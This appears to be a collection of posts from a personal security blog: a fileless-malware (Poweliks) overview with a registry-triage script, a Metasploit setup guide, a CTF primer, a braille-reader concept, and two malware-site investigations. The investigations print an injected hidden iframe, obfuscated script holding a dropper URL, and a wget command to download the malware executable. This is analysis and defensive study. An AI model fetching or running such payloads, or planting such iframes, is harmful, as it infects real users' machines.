File less Infection-1


A fileless infection is one where the infection never touches the disk and always remains in primary memory.

As no file is written to disk, it is hard for security products to detect and remove this kind of infection. The first case of fileless infection was seen in early 2000 with the worm named Code Red, which used an IIS server remote code execution exploit and injected the malware payload into memory.

The issue with this kind of malware is that it is gone after a reboot. So it was not persistent, and because it was not persistent, targeting a machine whose uptime is very low (for example a home PC) was not very useful.

But in 2014 Poweliks made the breakthrough and found a mechanism for remaining persistent, or rather for reinfecting the victim after a reboot.
So we can call it surviving the reboot.

The malware was found to be spread by the notorious Angler exploit kit.

Poweliks found a very interesting way to remain persistent in memory: it injects the payload into a Run registry entry, so when the system restarts it reinfects itself.

And it creates 2 components:

  1. Watchdog: keeps an eye on the registry entry; if the entry is removed, it recreates it. This part is always in memory.
  2. Payload: the real payload of the malware, which performs the malicious action.
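As an added example (not code from the post), here is a small Python triage for the persistence trick described above: it flags Run-key values that launch a script host or carry an inline or encoded script (the payload living in the registry rather than on disk), and compares two snapshots so that an entry which reappears after deletion points to a resident watchdog. The sample entries are constructed; the registry reader only works on Windows and is read-only.

```python
import re
import sys

# Constructed sample Run-key entries as (value name, command); not from a real host.
# The second mimics the design the post describes: the value name is non-printable
# and the command hands an inline script to a system script host, so the whole
# payload lives in the registry value and never touches disk.
SAMPLE_RUN_ENTRIES = [
    ("OneDrive", r'"C:\Users\alice\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background'),
    ("\x00", 'rundll32.exe javascript:"<constructed inline script body>"'),
    ("Updater", "powershell.exe -w hidden -enc " + "QUFB" * 12),  # fake base64 blob
]

# Programs that execute script handed to them rather than a binary of their own.
SCRIPT_HOSTS = ("rundll32", "mshta", "powershell", "pwsh", "wscript", "cscript", "regsvr32")
# Inline script protocols, or an encoded-command switch followed by a long base64 run.
INLINE_SCRIPT = re.compile(r"javascript:|vbscript:|-e\w*\s+[A-Za-z0-9+/=]{32,}", re.I)


def launched_program(command):
    """Program the command line starts: first token, quotes and path stripped, lower-cased."""
    cmd = command.strip()
    if cmd.startswith('"'):
        token = cmd[1:].split('"', 1)[0]      # quoted path, may contain spaces
    else:
        token = cmd.split(None, 1)[0] if cmd else ""
    return token.rsplit("\\", 1)[-1].lower()


def triage_entry(name, command):
    """Reasons (possibly none) why one Run entry looks like script-in-registry persistence."""
    reasons = []
    exe = launched_program(command)
    if any(exe.startswith(host) for host in SCRIPT_HOSTS):
        reasons.append(f"launches script host {exe}")
    if INLINE_SCRIPT.search(command):
        reasons.append("inline or encoded script in the value itself")
    if any(ord(c) < 32 or ord(c) == 127 for c in name):
        reasons.append("value name contains non-printable characters")
    return reasons


def triage_all(entries):
    """Map flagged value names to their reasons; clean entries are omitted."""
    result = {}
    for name, command in entries:
        reasons = triage_entry(name, command)
        if reasons:
            result[name] = reasons
    return result


def recreated_entries(flagged_before, snapshot_after):
    """Flagged names present again in a snapshot taken after they were deleted.

    A recreated entry is the watchdog signature from the post: the in-memory
    component is still alive, so its host process must be stopped before the
    registry is cleaned, or the entry simply comes back.
    """
    after_names = {name for name, _ in snapshot_after}
    return sorted(name for name in flagged_before if name in after_names)


def read_run_entries():
    """Read the current user's Run key on Windows (read-only); [] on other platforms."""
    if sys.platform != "win32":
        return []
    import winreg  # standard library, Windows only
    entries = []
    path = r"Software\Microsoft\Windows\CurrentVersion\Run"
    with winreg.OpenKey(winreg.HKEY_CURRENT_USER, path) as key:
        index = 0
        while True:
            try:
                name, value, _ = winreg.EnumValue(key, index)
            except OSError:  # no more values
                break
            entries.append((name, str(value)))
            index += 1
    return entries


if __name__ == "__main__":
    entries = read_run_entries() or SAMPLE_RUN_ENTRIES
    for name, reasons in triage_all(entries).items():
        print(repr(name), "->", "; ".join(reasons))
```

To use the watchdog check on a live host, take a snapshot, delete the flagged values, wait a few seconds, read the key again and pass both to recreated_entries.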

In the last couple of years I have done some in-depth research on fileless infection,

as a result of which I was able to publish a few research papers.
My research papers can be found at:
1) One-Click Fileless Infection: presented at Virus Bulletin 2016, Denver
2) Living Off the Land and Fileless Attack Techniques: published with Symantec

The payload of the malware is in the registry.


This was a brief overview of fileless infection.
I hope you guys like it; I will try to dive deeper into the matter in the next blog post.
Cheers


Fun with Metasploit


Metasploit is a framework developed in Ruby by H.D. Moore.

It provides multiple very easy-to-use interfaces, which can be used for

  1. Fingerprinting
  2. Exploitation
  3. Post exploitation

And it comes with cool tools used for exploit development and fuzzing, which makes it a fairly complete toolkit for the penetration tester; I personally have seen that almost all pentesters have used, and are still using, Metasploit one way or another.

And most people who start with security start with Metasploit.

In this tutorial we will discuss how to set up Metasploit.

Metasploit is available for Windows and Linux platforms.

Though I would suggest you use Kali Linux, which comes with Metasploit pre-installed along with a lot of other cool software you might need during pentesting or hacking.

In these tutorials I will be using msfconsole, which is the most famous, very stable and cool-looking command line interface. I can also create a write-up for Armitage,

its usage and other stuff (for that, hit me up or comment here).

Let's start by explaining what the above 3 points are.

Fingerprinting: it means finding the identity of the victim.
Metasploit is equipped with Nmap, which is the Swiss army knife for port scanning, OS scanning and many other things.

It can be used for fingerprinting the victim; along with it, Metasploit is equipped with multiple auxiliary modules for fingerprinting.

Exploitation: it means misusing some service so we can get access to the victim's machine.

Metasploit has multiple exploits; a few are client exploits, a few are server exploits. In a few cases they need user interaction and in a few no interaction is needed at all. Getting our backdoor delivered to the victim this way is the phase known as exploitation.

Post Exploitation: Metasploit has multiple backdoor payloads which are then executed on the victim so we can get access to the victim's machine.

Metasploit is equipped with multiple encoders too, so we can obfuscate the payload before delivering it to the victim, for evading security products.

I think this much theory is enough for now; let's get to practical Metasploit.
For these tutorials I will be using a Kali VM.

Download Kali from here -> https://www.kali.org/downloads/
And create a virtual machine using VMware or any other hypervisor.

Though I will be using VirtualBox, which can be downloaded from here -> https://www.virtualbox.org/wiki/Downloads

For all my blog posts I will try to use free tools as much as possible.

Once you are done with the installation, jump inside the Kali setup.

Start a terminal and run

service ssh start
ifconfig

The first command starts the SSH service on the VM so you can log in to your VM from your machine and start hacking,
and ifconfig is there so you know the IP address where you have to log in 😉
Once the SSH service is started, log in to your machine:
SSH to that IP address.
Once that is done, run

msfconsole

This will start the CLI version of Metasploit, which looks like this:

It might take some time to load msfconsole.
Once it is done, run the command

msfupdate

This command will update your Metasploit with all the new exploits and payloads and any other updates.

I guess this is it for this post. I will publish the next chapter very soon.

Cheers.

Getting Started With CTF


Hello Reader,

I am back after such a long time.

This post and a few more posts from here on are going to be super n00b, as they are going to target very basic stuff. If you are expecting some research project then I would suggest you follow me on Twitter @anand_himanshu and DM/email me.

Recently I have developed an interest in CTF (Capture The Flag) events. For those who don't know CTF: it is hacking an application to get the secret, which is known as the FLAG.

As per my experience to date, I can divide CTF events into the following categories

  1. Exploits
  2. Reversing files
  3. Crypto
  4. Human Error

I am not saying these are the only categories; there could be others which I might not be aware of at present, and most of the time one challenge depends on another for capturing the flag.

Here I will try to cover one topic at a time.

I will cover a few of the very basic tools for now, like

Metasploit
Nmap
Debuggers (no link, as I will try covering most of them; examples are IDA and Olly)
(Do comment if you are interested in any specific tool)

And eventually I will try to increase the level.

If you are looking for some super cool CTF blogs, write-ups and solutions, then I would suggest you guys visit

Gynvael; the guy is super cool, he does live hacking on YouTube and he is like a rock star.

And another super cool guy, LiveOverflow.

Follow these guys on Twitter and YouTube and learn from them.

And if you are looking for some cool CTF challenges, then I would suggest
1) http://reversing.kr (for reversing challenges)
2) https://www.root-me.org (almost all kinds of challenges)

Remember guys, it's like a puzzle: sometimes you might have to spend hours and get a hell of a lot of frustration. Not giving up is the key to the flag.

If I have missed something or some information is incorrect, then inform me.

Cheers and Happy Hacking 😉

Digital to braille..!!


The heading sounds exciting.
There is an MIT event happening next week (8th of July 2013). I was planning to participate but unfortunately was not able to get in, so I want everyone else to know what I have been thinking about for the last 2-3 weeks.
I am not much of an electronics guy and am trying to learn electronics, so please do tell me my mistakes so that I may improve it.

This concept is just a concept which I haven't demoed yet. I was planning to create a prototype at the event, but unfortunately I was not selected, so I am telling everyone so that I may have inputs from them, and if someone likes it then they may implement it.

Link to the event is here

I personally believe there are not many good devices on the market which would give a real-time reading experience to visually challenged people.

So this concept is to convert every digital medium to braille.
The best part is that it is not just for English or something; it would be able to convert all symbols and languages to braille.
A person using the reader will have the experience of reading a real book, and not just books: we may convert webpages and other digital media to braille.

There are not many pictures available, but I will try to provide them within a few days, as I have no camera and no electronics that I could show.

Constraints for the present prototype:
I am converting all the data to one particular font for now, and I am keeping the size constant for every medium.

Screen used: something similar to a magnetic slate, which works on the principle of the magnetic field.
Link to magnetic slate

I have no idea how to do this, so my next task is to make this screen work similarly to a Kindle reader,
and increase the magnetic field by supplying power (not sure; research in progress).
As my research says the E-ink technology works, we may develop something similar to the Kindle screen, which is an e-book reader.

Let's place this screen directly above a breadboard which has office pins in it.
Now, as the image is produced on the screen, it will produce a magnetic field which pulls the office pins towards it.
As we all know, magnetic force is vectorial in nature; those who don't can read about it here: http://hyperphysics.phy-astr.gsu.edu/hbase/magnetic/magfor.html
Now the pins directly below the symbols on the screen will be pulled towards it, and the pins which are not directly below will feel the force component at some angle, so they won't be pulled up as much as the pins directly below the symbols (remember that the symbols are magnetic).
Now it is time to measure the distance by which the pins are raised.
This is all I am sure about; after that I am not sure about things.

First

We may use the pins to trigger the circuit for the specific pattern and produce the content on an electronic braille screen, or refreshable braille display.

Second

We may trigger the circuit by measuring the movement from below the breadboard and then trigger the screen.

Advantages:
1) It is fast.
2) It will convert all the characters shown on the screen to braille.
3) It will give the real feel of reading a book or viewing a webpage in real time.
For now the only constraint is font and size, and I am not sure whether this really matters.

Different ideas which are kind of similar, and from which this idea was inspired:
1) A braille reader can read up to 200 words per minute
http://www.epokh.org/blog/?p=235
2) Zixel: A 2.5-D Graphical Tactile Display System
http://anirudh.me/2011/05/zixel-a-2-5-d-graphical-tactile-display-system/
3) World’s 1st Braille Smartphone for Blind People
http://updateszone.com/worlds-1st-braille-smartphone-for-blind-people-coming-soon/

Comments and views required.
I would love it if someone felt like implementing this at their end, and I would love to extend this 🙂

My work for autistic people is on my other blog; this was my first blog post for visually challenged people, and I will post more updates on this work very soon.
Link to my other blog:
http://www.techautismandme.wordpress.com

Handling error 402: Payment Required with malicious domain #MMD


Link from where I started:

http://urlquery.net/report.php?id=1858750

And this link directed me here:

h00p://xfecajsmipichbex[dot]in/s5c1fN0XuiI0WhDF0sxHb0Xavz0a4mO0bg7N0NyYL/vSdOqASe.jar

Error 402: Payment Required.

Request URL:h00p://xfecajsmipichbex[dot]in/s5c1fN0XuiI0WhDF0sxHb0Xavz0a4mO0bg7N0NyYL/vSdOqASe.jar
Request Method:GET
Status Code:402 Payment Required
Response Header
Cache-Control:no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Length:0
Content-Type:text/html; charset=utf-8
Date:Mon, 08 Apr 2013 13:16:25 GMT
Expires:Thu, 19 Nov 1981 08:52:00 GMT
Pragma:no-cache
Server:nginx/0.7.64
X-Powered-By:ASP.NET version 4
X-Powered-By:HPHP

Suspicious, isn't it?

So I proceeded by going into the subdirectories of the server, which resulted in the link

h00p://xfecajsmipichbex[dot]in/s5c1fN0XuiI0WhDF0sxHb0Xavz0a4mO0bg7N0NyYL

which automatically led to a blank webpage.

Response for h00p://xfecajsmipichbex[dot]in/s5c1fN0XuiI0WhDF0sxHb0Xavz0a4mO0bg7N0NyYL/pdfx.html

Cache-Control:no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Length:817
Content-Type:text/html;charset=utf-8
Date:Mon, 08 Apr 2013 15:49:50 GMT
Expires:Thu, 19 Nov 1981 08:52:00 GMT
Pragma:no-cache
Server:nginx/0.7.64
X-Mode:HTML
X-Powered-By:ASP.NET version 4
X-Powered-By:HPHP

Response for “h00p://xfecajsmipichbex[dot]in/s5c1fN0XuiI0WhDF0sxHb0Xavz0a4mO0bg7N0NyYL/zmiohek.html”

Cache-Control:no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Encoding:gzip
Content-Length:1676
Content-Type:text/html;charset=utf-8
Date:Mon, 08 Apr 2013 15:49:51 GMT
Expires:Thu, 19 Nov 1981 08:52:00 GMT
Pragma:no-cache
Server:nginx/0.7.64
X-Mode:HTML
X-Powered-By:ASP.NET version 4
X-Powered-By:HPHP

When I tried to analyse its source, I found a variable storing a web address.

<script>
var icEVKt;
var Owsfe;CvkiFV='RHaLS';if (CvkiFV=='Yiwvd') vPUR='CnYEdy';
var XXwVKa="h00p://xfecajsmipichbex[dot]in/dkCSD30yLXI0ANWV0N3ab0JYAK0i1gr0xpz10m3aM0kkMd0odNL0RERP17ZDG16mRL0N8KM0XG9d0S0XG0GzNV05JZ10HrMA02rUm0AUgY0kQdn11pUL0qQQt0DZQ012fm611kpG0FebV0oNUn08f3o0gxYY0MaW413LKv03FP40Er9118am10Jld80lyyk11HiD0gmv2/TL7vbliVHL.exe?IUABFhcBXOgtL0ce=m&h=32";
</script>
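An added example (not from the post): a Python triage of the kind of response and landing-page script shown above. It records the inconsistencies a practitioner would note in those headers (an empty 402, two conflicting X-Powered-By values, PHP's fixed session Expires date, an HTML body for a .jar request) and pulls quoted URL literals out of the script variable, defanging them for a report. The header text and request URL are the post's; the script and the URL inside it are constructed stand-ins.

```python
import re

# Request and response as the post shows them for the .jar request (status 402).
SAMPLE_URL = "h00p://xfecajsmipichbex[dot]in/s5c1fN0XuiI0WhDF0sxHb0Xavz0a4mO0bg7N0NyYL/vSdOqASe.jar"
SAMPLE_STATUS = 402
SAMPLE_HEADERS = """\
Cache-Control:no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Length:0
Content-Type:text/html; charset=utf-8
Date:Mon, 08 Apr 2013 13:16:25 GMT
Expires:Thu, 19 Nov 1981 08:52:00 GMT
Pragma:no-cache
Server:nginx/0.7.64
X-Powered-By:ASP.NET version 4
X-Powered-By:HPHP"""

# Constructed stand-in for the obfuscated script that held the download URL.
SAMPLE_SCRIPT = """<script>
var icEVKt;
var Owsfe;CvkiFV='RHaLS';if (CvkiFV=='Yiwvd') vPUR='CnYEdy';
var XXwVKa="h00p://dropper-host[dot]example/abc123/payload.exe?k=m&h=32";
</script>"""

# PHP's session cache limiter always sends this fixed Expires value.
PHP_SESSION_EXPIRES = "Thu, 19 Nov 1981 08:52:00 GMT"
BINARY_EXTENSIONS = {"jar", "exe", "pdf", "swf"}


def parse_headers(raw):
    """Parse devtools-style 'Name:value' lines into an ordered list of (name, value)."""
    pairs = []
    for line in raw.splitlines():
        if ":" in line:
            name, value = line.split(":", 1)
            pairs.append((name.strip(), value.strip()))
    return pairs


def triage_response(url, status, pairs):
    """Observations an analyst would record for this request/response pair."""
    by_name = {}
    for name, value in pairs:
        by_name.setdefault(name.lower(), []).append(value)
    notes = []
    if status == 402 and by_name.get("content-length") == ["0"]:
        notes.append("402 Payment Required with an empty body: no real paywall behaviour")
    powered = by_name.get("x-powered-by", [])
    if len(powered) > 1:
        notes.append("duplicate X-Powered-By: " + " / ".join(powered))
    stack = " ".join(powered).lower()
    if "asp.net" in stack and "hphp" in stack:
        notes.append("contradictory stack claims: ASP.NET and HPHP (HipHop PHP) on one response")
    if by_name.get("expires") == [PHP_SESSION_EXPIRES]:
        notes.append("Expires is PHP's fixed session value: backend is PHP whatever X-Powered-By says")
    ext = url.split("?", 1)[0].rsplit("/", 1)[-1].rsplit(".", 1)[-1].lower()
    ctype = by_name.get("content-type", [""])[0]
    if ext in BINARY_EXTENSIONS and ctype.startswith("text/html"):
        notes.append(f"requested a .{ext} but the server answered with {ctype}")
    return notes


# Quoted URL literal, whether plain or already defanged (h00p/hxxp).
URL_STRING = re.compile(r"""["']((?:h00p|hxxp|http)s?://[^"'\s]+)["']""", re.I)


def extract_urls(script_text):
    """Quoted URL literals assigned inside a script block."""
    return URL_STRING.findall(script_text)


def defang(url):
    """Neutralise the scheme and host dots so the URL cannot be clicked from a report."""
    m = re.match(r"(?:h00p|hxxp|http)(s?)://([^/?#]+)(.*)", url, re.I | re.S)
    if not m:
        return url
    secure, host, rest = m.groups()
    host = host.replace("[dot]", ".").replace(".", "[.]")
    return f"hxxp{secure}://{host}{rest}"


if __name__ == "__main__":
    for note in triage_response(SAMPLE_URL, SAMPLE_STATUS, parse_headers(SAMPLE_HEADERS)):
        print("-", note)
    for found in extract_urls(SAMPLE_SCRIPT):
        print("url:", defang(found))
```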

Now use

wget --save-headers -d h00p://xfecajsmipichbex[dot]in/dkCSD30yLXI0ANWV0N3ab0JYAK0i1gr0xpz10m3aM0kkMd0odNL0RERP17ZDG16mRL0N8KM0XG9d0S0XG0GzNV05JZ10HrMA02rUm0AUgY0kQdn11pUL0qQQt0DZQ012fm611kpG0FebV0oNUn08f3o0gxYY0MaW413LKv03FP40Er9118am10Jld80lyyk11HiD0gmv2/TL7vbliVHL.exe?IUABFhcBXOgtL0ce=m&h=32

-d for debugging and --save-headers for saving the headers.

Or

simply paste this in your browser to download the exe 😉

Now this is the analysis report of this file from VirusTotal, and it says 8/45

https://www.virustotal.com/en/file/cb92c51ba26391eae67d85b968b61a71e33cea4a82894f10fa6777ae9938e7e8/analysis/

Anubis Report for this exe

http://anubis.iseclab.org/?action=result&task_id=1956ca7159064b544fd05dd3c6c72cd5e&format=pdf

Dig Report

dig XFECAJSMIPICHBEX.IN ANY
; <<>> DiG 9.8.3-P1 <<>> XFECAJSMIPICHBEX.IN ANY
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 5853
;; flags: qr rd ra; QUERY: 1, ANSWER: 6, AUTHORITY: 0, ADDITIONAL: 0
;; QUESTION SECTION:
;XFECAJSMIPICHBEX.IN. IN ANY
;; ANSWER SECTION:
XFECAJSMIPICHBEX.IN. 28800 IN A 192.210.150.43
XFECAJSMIPICHBEX.IN. 7200 IN SOA erdomain.mercury.orderbox-dns.com. founderapi.email.com. 2013040403 7200 7200 172800 38400
XFECAJSMIPICHBEX.IN. 38400 IN NS erdomain.mars.orderbox-dns.com.
XFECAJSMIPICHBEX.IN. 38400 IN NS erdomain.venus.orderbox-dns.com.
XFECAJSMIPICHBEX.IN. 38400 IN NS erdomain.mercury.orderbox-dns.com.
XFECAJSMIPICHBEX.IN. 38400 IN NS erdomain.earth.orderbox-dns.com.
;; Query time: 401 msec
;; SERVER: 192.168.1.1#53(192.168.1.1)
;; WHEN: Tue Apr 9 11:42:38 2013
;; MSG SIZE rcvd: 239

whois xfecajsmipichbex.in
Domain ID:D7196301-AFIN
Domain Name:XFECAJSMIPICHBEX.IN
Created On:04-Apr-2013 21:46:01 UTC
Last Updated On:04-Apr-2013 21:46:03 UTC
Expiration Date:04-Apr-2014 21:46:01 UTC
Sponsoring Registrar:Webiq Domains Solutions Pvt. Ltd. (R131-AFIN)
Status:CLIENT TRANSFER PROHIBITED
Status:TRANSFER PROHIBITED
Status:ADDPERIOD
Registrant ID:WIQ_27213783
Registrant Name:founder api
Registrant Organization:N/A
Registrant Street1:foundap 4
Registrant City:new york
Registrant State/Province:New York
Registrant Postal Code:10006
Registrant Country:US
Registrant Phone:+1.5274563219
Registrant Email:founderapi@email.com

Domains hosted over Same IP Virus total report:
https://www.virustotal.com/en/ip-address/192.210.150.43/information/

If you check the WhoIs for every domain you will find the same credentials, like the phone number.

Screenshot of h00p://192.210.150.43/

Screenshot of the geographical address locator.

According to the code at http://wepawet.iseclab.org/view.php?hash=453609c244e3925ce0fe662a71eba0a8&t=1365501256&type=js

there are 2 PDFs, but I was able to download just 1 of the 2.

PDF downloaded:

TLfeaOwS.pdf

Header for page “h00p://xfecajsmipichbex[dot]in/s5c1fN0XuiI0WhDF0sxHb0Xavz0a4mO0bg7N0NyYL/TLfeaOwS.pdf”

PDF data in the browser:

%PDF-1.6 %�•� 18 0 obj <> endobj 6 0 obj <> endobj 22 0 obj <> endobj 8 0 obj <> stream 1.6511*pdf Piexnlaypa

endstream endobj 20 0 obj <> endobj 23 0 obj <> endobj 5 0 obj <> endobj 1 0 obj <> endobj 21 0 obj <> endobj 7 0 obj <> /XObject <<>>>> endobj 19 0 obj <> endobj xref 0 24 trailer <> startxref 802 %%EOF
Cache-Control:no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Encoding:gzip
Content-Length:5531
Content-Type:text/html;charset=utf-8
Date:Tue, 09 Apr 2013 13:17:17 GMT
Expires:Thu, 19 Nov 1981 08:52:00 GMT
Pragma:no-cache
Server:nginx/0.7.64
X-Mode:HTML
X-Powered-By:ASP.NET version 4
X-Powered-By:HPHP

VirusTotal report for the pdf file

https://www.virustotal.com/en/file/e0be674422a6579361b0724da99eee4c9b33e137239a7268c530f1afea0c1b3d/analysis/1366874391/

which confirms this as malicious.

Snapshot of all the files.

Every time you download the file it is going to give it some random name.

#MalwareMustDie

Malicious robaina91.com analysis #MMD


We got the information about the bad guy from this link (http://urlquery.net/report.php?id=1906732),

which finally leads us to this (h00p://www.robaina91[dot]com/es/robaina-album.html) website.

This looks like a normal one but it is not (though Google Chrome already told me that the site is malicious).

Let's try to see the reply headers:

Accept-Ranges:bytes
Connection:close
Content-Length:30270
Content-Type:text/html
Date:Wed, 10 Apr 2013 10:45:33 GMT
ETag:"5e18278-763e-51f1a980"
Last-Modified:Fri, 01 Feb 2013 20:09:26 GMT
Server:Apache/2.2.3 (CentOS)

Looks like a normal one; indeed it is. Let's dig a little more 🙂

On a little analysis of this code I found

<iframe src="h00p://allbestauto042[dot]ru/in.cgi?ftp" style="position: absolute; border: 0px; height: 1px; width: 1px; left: 1px; top: 1px;">
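An added example, not the post's own code: a Python scanner for injected iframes like the one above. It parses a page's iframe tags and reports those that are effectively invisible to the visitor (a few pixels in size, positioned off-screen, or hidden by CSS), which is the inclusion pattern the post found. The HTML fragment is constructed around the iframe tag quoted from the post.

```python
import re
from html.parser import HTMLParser

# Constructed page fragment: an ordinary embedded player plus the injected
# iframe tag quoted in the post (host already defanged there).
SAMPLE_HTML = """<html><body>
<h1>Album</h1>
<iframe src="https://video.example/embed/123" width="560" height="315"></iframe>
<iframe src="h00p://allbestauto042[dot]ru/in.cgi?ftp" style="position: absolute; border: 0px; height: 1px; width: 1px; left: 1px; top: 1px;"></iframe>
</body></html>"""

TINY_PX = 4  # a frame at or below this size in both dimensions is invisible in practice


def _px(value):
    """Leading integer of a CSS/HTML length such as '1px' or '560'; None if absent."""
    m = re.match(r"\s*(-?\d+)", value or "")
    return int(m.group(1)) if m else None


def _style_map(style):
    """Parse an inline style attribute into {property: value}, lower-cased."""
    out = {}
    for decl in (style or "").split(";"):
        if ":" in decl:
            prop, val = decl.split(":", 1)
            out[prop.strip().lower()] = val.strip().lower()
    return out


def iframe_reasons(attrs):
    """Why this iframe would be invisible to the visitor; empty list if it would not."""
    a = {k.lower(): v for k, v in attrs}
    st = _style_map(a.get("style"))
    width = _px(st.get("width", a.get("width")))
    height = _px(st.get("height", a.get("height")))
    reasons = []
    if width is not None and height is not None and width <= TINY_PX and height <= TINY_PX:
        reasons.append(f"tiny frame {width}x{height}px")
    if st.get("visibility") == "hidden" or st.get("display") == "none":
        reasons.append("frame hidden by CSS")
    for side in ("left", "top"):
        offset = _px(st.get(side))
        if offset is not None and offset < 0:
            reasons.append(f"positioned off-screen ({side}: {offset}px)")
    if reasons and st.get("position") == "absolute":
        reasons.append("absolutely positioned")  # taken out of the page flow as well
    return reasons


class HiddenIframeFinder(HTMLParser):
    """Collects (src, reasons) for every iframe that looks deliberately concealed."""

    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() != "iframe":
            return
        reasons = iframe_reasons(attrs)
        if reasons:
            self.findings.append((dict(attrs).get("src") or "", reasons))


def find_hidden_iframes(html):
    parser = HiddenIframeFinder()
    parser.feed(html)
    parser.close()
    return parser.findings


if __name__ == "__main__":
    for src, reasons in find_hidden_iframes(SAMPLE_HTML):
        print(src, "->", "; ".join(reasons))
```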

 

OK, let's analyse this link: h00p://allbestauto042[dot]ru/in.cgi?ftp

The headers say

Request URL:h00p://allbestauto042[dot]ru/in.cgi?ftp
Request Method:GET
Status Code:302 Found

Query String Parameters:

  1. ftp:

Response Headers:

Connection:close
Content-Type:text/html; charset=UTF-8
Date:Thu, 11 Apr 2013 06:08:31 GMT
Location:http://google.com
Server:Apache/2.2.15 (CentOS)
Set-Cookie:vbpnxftp=_1_10000_; expires=Fri, 12-Apr-2013 06:08:31 GMT; path=/;domain=allbestauto042.ru
Set-Cookie:TSUSER=ftp; expires=Fri, 11-Apr-2014 06:08:31 GMT;path=/;domain=allbestauto042.ru
Transfer-Encoding:chunked

Why 302, why is it redirecting, and why is it not showing Google? IDK, please do tell me as I have no idea, but this looks suspicious.

After this it loads 10 PHP files:

h00p://newssearch006[dot]ru/flow01.php

ranging from flow01 to flow10.

Let's dig a little more.

Request URL:h00p://promoution115[dot]ru/tds/in.cgi?default
Request Method:GET
Status Code:302 Found

Response headers

Connection:close
Content-Type:text/html; charset=UTF-8
Date:Thu, 11 Apr 2013 06:14:46 GMT
Location:http://www.google.com
Server:Apache/2.2.15 (CentOS)
Set-Cookie:vbpnxdefault=_10_0_20_; expires=Fri, 12-Apr-2013 06:14:46 GMT; path=/; domain=promoution115.ru
Set-Cookie:vbpnx2=_0_98_102_48_35_58_88_; expires=Fri, 12-Apr-2013 06:14:46 GMT; path=/; domain=promoution115.ru
Transfer-Encoding:chunked

Again redirecting.

After digging a little more I came across

“h00p://1peregon.3d-game[dot]com/pZ8UZz0BD2G0ICJF0zMwF0Uq350We0P0m89M01WMv0B0x1/pdfx.html”

and

“h00p://1peregon.3d-game[dot]com/pZ8UZz0BD2G0ICJF0zMwF0Uq350We0P0m89M01WMv0B0x1/exvft.html”

This asks me to use Java; as I don't know the website I never gave permission, but this means I am on track and close to my target.

So let's dig a little more.

Cache-Control:no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Encoding:gzip
Content-Length:735
Content-Type:text/html;charset=utf-8
Date:Thu, 11 Apr 2013 04:17:33 GMT
Expires:Thu, 19 Nov 1981 08:52:00 GMT
Pragma:no-cache
Server:nginx/0.7.64
X-Mode:HTML
X-Powered-By:ASP.NET version 4
X-Powered-By:HPHP

Let's take a look at its code

<script>
ZNtS='UVne';if (ZNtS=='NYhMNY') RQvjqh();function RfTuWD(){}function omjcz(){}var PMispi=219;TbtOk='iCUcc';if (TbtOk=='xsPS') eHaPAj='PWcK';
var TgPZN='YxGr';function zuWU(){var PjSQr='LEBk';kGuff='kVcVPJ';if (kGuff=='DgDnT') jCdMP();}FOgl='mNgzp';if (FOgl=='FdLFVa') wJkyeL='nyLce';
var kdXJWSBiW="h00p://1peregon.3d-game[dot]com/Ida6oe12WoP0i86j0ptqk0Tb9o09y270qr4X09QWG00qKN0I9BE151Dh0dABk0Fydh07d0h0fdAR0Z46U0TIRF0V3bN06qds0cAaJ0ZSQ80z0xU13bbJ043fY0YfOj0LmTy0yAaf151hk0HZHU0Le8w0Avyw0sxPI06hj50EAdx0Frnc0V7cq0n8LE0jcwk0kf6u17lnV0of8B/tSZ0MKcxCD.exe?8=nNAXHA";
</script>

Isn't this suspicious..??

h00p://1peregon.3d-game[dot]com/Ida6oe12WoP0i86j0ptqk0Tb9o09y270qr4X09QWG00qKN0I9BE151Dh0dABk0Fydh07d0h0fdAR0Z46U0TIRF0V3bN06qds0cAaJ0ZSQ80z0xU13bbJ043fY0YfOj0LmTy0yAaf151hk0HZHU0Le8w0Avyw0sxPI06hj50EAdx0Frnc0V7cq0n8LE0jcwk0kf6u17lnV0of8B/tSZ0MKcxCD.exe?8=nNAXHA

Let's see the other file now, and this ends up with

Request URL:h00p://1peregon.3d-game[dot]com/pZ8UZz0BD2G0ICJF0zMwF0Uq350We0P0m89M01WMv0B0x1/exvft.html
Request Method:GET
Status Code:200 OK
Cache-Control:no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Encoding:gzip
Content-Length:1701
Content-Type:text/html;charset=utf-8
Date:Thu, 11 Apr 2013 12:04:24 GMT
Expires:Thu, 19 Nov 1981 08:52:00 GMT
Pragma:no-cache
Server:nginx/0.7.64
X-Mode:HTML
X-Powered-By:ASP.NET version 4
X-Powered-By:HPHP


So the body is just a text input holding one long string of random-looking encoded text…

Nothing much. Let's get back and analyse the file which we got from the JavaScript 🙂

<script>
ZNtS='UVne';if (ZNtS=='NYhMNY') RQvjqh();function RfTuWD(){}function omjcz(){}var PMispi=219;TbtOk='iCUcc';if (TbtOk=='xsPS') eHaPAj='PWcK';
var TgPZN='YxGr';function zuWU(){var PjSQr='LEBk';kGuff='kVcVPJ';if (kGuff=='DgDnT') jCdMP();}FOgl='mNgzp';if (FOgl=='FdLFVa') wJkyeL='nyLce';
var kdXJWSBiW="h00p://1peregon.3d-game[dot]com/Ida6oe12WoP0i86j0ptqk0Tb9o09y270qr4X09QWG00qKN0I9BE151Dh0dABk0Fydh07d0h0fdAR0Z46U0TIRF0V3bN06qds0cAaJ0ZSQ80z0xU13bbJ043fY0YfOj0LmTy0yAaf151hk0HZHU0Le8w0Avyw0sxPI06hj50EAdx0Frnc0V7cq0n8LE0jcwk0kf6u17lnV0of8B/tSZ0MKcxCD.exe?8=nNAXHA";
</script>

The new script, and there we got what we really wanted 🙂

“h00p://1peregon.3d-game[dot]com/Ida6oe12WoP0i86j0ptqk0Tb9o09y270qr4X09QWG00qKN0I9BE151Dh0dABk0Fydh07d0h0fdAR0Z46U0TIRF0V3bN06qds0cAaJ0ZSQ80z0xU13bbJ043fY0YfOj0LmTy0yAaf151hk0HZHU0Le8w0Avyw0sxPI06hj50EAdx0Frnc0V7cq0n8LE0jcwk0kf6u17lnV0of8B/tSZ0MKcxCD.exe?8=nNAXHA”

 

The real malware, which we always wanted to have 🙂

